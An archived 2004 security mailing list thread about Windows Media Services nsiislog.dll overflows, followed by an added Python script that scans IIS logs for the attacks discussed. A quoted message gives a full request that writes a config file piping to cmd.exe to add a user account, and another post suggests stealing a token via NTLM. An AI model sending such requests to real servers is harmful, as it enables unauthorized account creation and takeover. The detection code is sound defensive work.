Dailydave mailing list archives

RE: New mediaservices sploit


From: "Brett Moore" <brett () softwarecreations co nz>
Date: Sun, 14 Mar 2004 21:52:55 +1300

It's late so I may be confused.. since it's Sunday, I most likely am.

Chunked Encoded Heap Overflow
http://www.microsoft.com/technet/security/Bulletin/MS03-019.mspx

Large Post Stack Overflow
http://www.microsoft.com/technet/security/Bulletin/MS03-022.mspx

And the revised bulletin last week was to fix an issue where if
media services was uninstalled and then the patch was applied,
and then media services was reinstalled, it would install the
old vulnerable dll.

http://downloads.securityfocus.com/vulnerabilities/exploits/firew0rker.c
looks like an exploit for the stack-based overflow... I haven't tested it
but the vulnerable .dll (well it should be) is installed if somebody wants
to..

Brett




-----Original Message-----
From: dailydave-bounces () lists immunitysec com
[mailto:dailydave-bounces () lists immunitysec com]On Behalf Of Dave Aitel
Sent: Sunday, March 14, 2004 8:23 AM
To: dailydave () lists immunitysec com
Subject: Re: [Dailydave] New mediaservices sploit


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

H D Moore wrote:

| The code was posted to a few sites, it doesn't crash nor exploit
| any version of nsiislog.dll that I could find. Tested multiple
| variations on a stock Windows 2000 SP0 system without any real
| result. I am assuming that since it's in CANVAS, it actually works
| on /something/, are there any special circumstances required to
| trigger it? Does the MS03-019 patch have to be installed for it to be
| vulnerable to this MX_Stats overflow? It almost sounds like it is
| just another variation of the POST bug... is it also fixed by
| MS03-022?


Well, the POST bug was a heap overflow, and this bug is a stack
overflow, so I dunno. It works on my version of nsiislog.dll, which is
fairly old. It's been a while since I wrote it, so I don't remember
exactly what happened with the patch situation.

|
| Brett actually found three bugs in this ISAPI; the original chunked
|  encoding one, then the POST content overflow, and finally the one
| which was released by M$ last week. Does anyone have details on the
| latest vuln?

Last week? I think I must have missed it.


|
| Bonus points to anyone who can find a better way to exploit the
| unnamed bug^H^H^Hfeature below, without being dependent on an
| alternate web service or third-party software. The goal is instant
| command execution through writing a file to the system with
| arbitrary (even binary) contents. Writing to autoexec, startup, etc
| doesn't work since it requires user interaction. Assuming Windows
| 2000 or newer. Writing ".job" files to \winnt\tasks doesn't work
| now that signatures are embedded (thanks Brett for info).
|
| GET /plugins/framework/script/tree.xms?obj=httpd:WriteToFile([$__installdir$]conf/portlisten.conf,Listen%208000%0A%0DAccessLog%20"|../../../../../../winnt/system32/cmd.exe%20/c%20net%20user%20P%20P%20/ADD"%0A%0D HTTP/1.0
|
| -HD


You can't write a .asp file into the scripts directory? Or a .dll? I
assume not. You're running as SYSTEM? Why not write to \\myserver\\
and steal the token and relogin through NTLM auth?

- -dave



|
| On Saturday 13 March 2004 10:55, Dave Aitel wrote:
|
|> Securityfocus's vulnerability database isn't really that good for
|>  accuracy. I checked out their update on this media services bug,
|> and noticed that one of the sploits is for something that was
|> never publicly released. This is a new bug, not the old bug that
|> Brett Moore found.
|>
|> http://downloads.securityfocus.com/vulnerabilities/exploits/firew0rker.c
|>
|> (It's in CANVAS as well, btw)
|>
|> -dave
|>
|> _______________________________________________ Dailydave mailing
|> list Dailydave () lists immunitysec com
|> http://www.immunitysec.com/mailman/listinfo/dailydave
|
| _______________________________________________ Dailydave mailing
| list Dailydave () lists immunitysec com
| http://www.immunitysec.com/mailman/listinfo/dailydave


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFAU1+NzOrqAtg8JS8RAgv+AJwKe9u1cuTDggWG0jGGMAPHE3N7lgCfVeUR
q3eaEdpJZeuG97kHz07TkOU=
=E4yX
-----END PGP SIGNATURE-----

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://www.immunitysec.com/mailman/listinfo/dailydave

Attachment: midNSIISLOG.DLL
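The thread above describes two request patterns worth recognising on the defensive side: the oversized POST to nsiislog.dll behind MS03-022, and the tree.xms WriteToFile request that drops a config file whose AccessLog directive pipes into cmd.exe. The script below is an added example, not code from the thread or from any of the posters: it parses constructed W3C-format IIS log lines and flags both patterns, and it decodes the WriteToFile argument to show the file that request would write. The field order, the sample lines and the 8192-byte threshold are assumptions made for the example.

```python
"""Triage of W3C IIS log lines for the two request patterns discussed above.

Added example, not code from the thread or from any poster. Field order,
sample lines and the size threshold are assumptions made for this example.
"""
import re
from urllib.parse import unquote

# Assumed W3C Extended field order; a real log states it in its #Fields: line.
FIELDS = ["date", "time", "c-ip", "cs-method", "cs-uri-stem",
          "cs-uri-query", "sc-status", "cs-bytes"]

# Assumed threshold: the Media Services client-status POSTs handled by
# nsiislog.dll are small, so a body this large is worth a look.
LARGE_POST_BYTES = 8192

# Constructed sample lines (not real traffic). The third record carries the
# request quoted in the thread, split into stem and query as IIS logs it.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs-bytes
2004-03-14 08:23:01 10.0.0.5 POST /scripts/nsiislog.dll - 200 412
2004-03-14 08:23:09 10.0.0.9 POST /scripts/nsiislog.dll - 500 65536
2004-03-14 08:24:17 10.0.0.9 GET /plugins/framework/script/tree.xms obj=httpd:WriteToFile([$__installdir$]conf/portlisten.conf,Listen%208000%0A%0DAccessLog%20"|../../../../../../winnt/system32/cmd.exe%20/c%20net%20user%20P%20P%20/ADD"%0A%0D 200 0
2004-03-14 08:25:00 10.0.0.7 GET /index.html - 200 0
"""


def parse_line(line):
    """Parse one log line into a dict; None for comment, blank or short lines."""
    if not line.strip() or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    rec["cs-bytes"] = int(rec["cs-bytes"])
    return rec


def check_record(rec):
    """Return the names of the patterns that match one parsed record."""
    hits = []
    stem = rec["cs-uri-stem"].lower()
    query = unquote(rec["cs-uri-query"])  # decode %XX once, as the server would
    lowered = query.lower()

    # MS03-022 pattern: an unusually large POST to the Media Services ISAPI.
    if (rec["cs-method"] == "POST" and stem.endswith("/nsiislog.dll")
            and rec["cs-bytes"] > LARGE_POST_BYTES):
        hits.append("large-post-nsiislog")

    # File-write "feature" from the thread: a WriteToFile call together with a
    # ../ sequence anywhere in the decoded query.
    if "writetofile(" in lowered and ("../" in lowered or "..\\" in lowered):
        hits.append("writetofile-traversal")

    # The payload it writes: a quoted pipe handing a log to cmd.exe.
    if '"|' in query and "cmd.exe" in lowered:
        hits.append("piped-command")
    return hits


def extract_written_file(query):
    """Return (path, decoded contents) for a WriteToFile(...) query, else None."""
    decoded = unquote(query)
    m = re.search(r"WriteToFile\(([^,]+),(.*)$", decoded, re.I | re.S)
    if not m:
        return None
    path, body = m.group(1), m.group(2)
    if body.endswith(")"):
        body = body[:-1]
    return path, body


def triage(log_text):
    """Return (client ip, uri stem, hits) for every record that matched."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = check_record(rec)
        if hits:
            findings.append((rec["c-ip"], rec["cs-uri-stem"], hits))
    return findings


if __name__ == "__main__":
    for ip, stem, hits in triage(SAMPLE_LOG):
        print(ip, stem, ", ".join(hits))
    rec = parse_line(SAMPLE_LOG.splitlines()[3])
    path, body = extract_written_file(rec["cs-uri-query"])
    print("would write", path)
    print(body)
```

Decoding the query before matching matters: the pipe, the slashes and the cmd.exe string only line up once the %20/%0A/%0D sequences are turned back into bytes, which is also why the decoded body shows the LF-CR line endings exactly as the request supplies them.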
